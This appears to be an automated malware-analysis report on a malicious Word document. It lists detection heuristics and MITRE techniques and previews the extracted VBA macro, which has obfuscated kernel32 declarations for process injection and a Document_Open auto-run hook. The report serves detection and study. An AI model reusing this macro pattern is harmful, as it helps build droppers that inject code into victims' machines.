MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro, which is a common technique for initiating malicious actions upon opening a document. The macros reference Windows APIs such as CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, indicating the likely intent to inject and execute a payload in memory. This suggests the file acts as a dropper for a second-stage malicious executable.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6438655-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6438655-0
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREADReference to CreateRemoteThread API
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2022 bytes |
SHA-256: 8da607101f3341eca797ae05b1e40e3ff0f95b3c6d551a266482c38e2ede590f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Type PROC
pr As Long
gdfgs As Long
asdfasdf As Long
wqrwerfsae As Long
End Type
Private Type INFO
cb As Long
asdfasdf As String
asdfhfg As String
ouin As String
dtbd As Long
sdfvs As Long
nulim As Long
xbyju As Long
dwXCountChars As Long
dwYCountChars As Long
erctvtuuno As Long
jbuytbju As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
lmomgt As Long
hStdOutput As Long
hStdError As Long
End Type
Private Declare _
PtrSafe _
Function aaa Lib _
"kernel32" _
Alias _
"CreateRemoteThread" (ByVal pr _
As Long, ByVal gerwcfgerwct As Long, ByVal ewrcterwctwe As Long, ByVal uyinuyit As LongPtr, qwrceeqwre As Long, ByVal omu9olnryu As Long, qertwqc As Long) As LongPtr
Private Declare PtrSafe _
Function bbb Lib "kernel32" _
Alias _
"VirtualAllocEx" (ByVal pr _
As Long, ByVal gsdfgrsdr As Long, ByVal rgaegedg As Long, ByVal gasdfgasdf As Long, ByVal gaesrgear As Long) As LongPtr
Private Declare _
PtrSafe Function ccc Lib _
"kernel32" _
Alias _
"RtlMoveMemory" (ByVal pr As Long, ByVal crefytrey As _
LongPtr, ByRef ervyertvy As Any, ByVal ikbedhrt As Long, ByVal ertcqxeerqw As LongPtr) As LongPtr
Private Declare PtrSafe Function ddd Lib _
"kernel32" Alias _
"CreateProcessA" (ByVal gdfhdfsghs As String, _
ByVal sfghfshdh As String, hdhdfgsad As Any, jkukghjyg As Any, ByVal asdfwetry As Long, ByVal ioiuyio As Long, yuiort As Any, ByVal ertyer As String, erevcbc As INFO, ewymoikfgh As PROC) As Long
Sub Document_Open()
Call njjVu
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.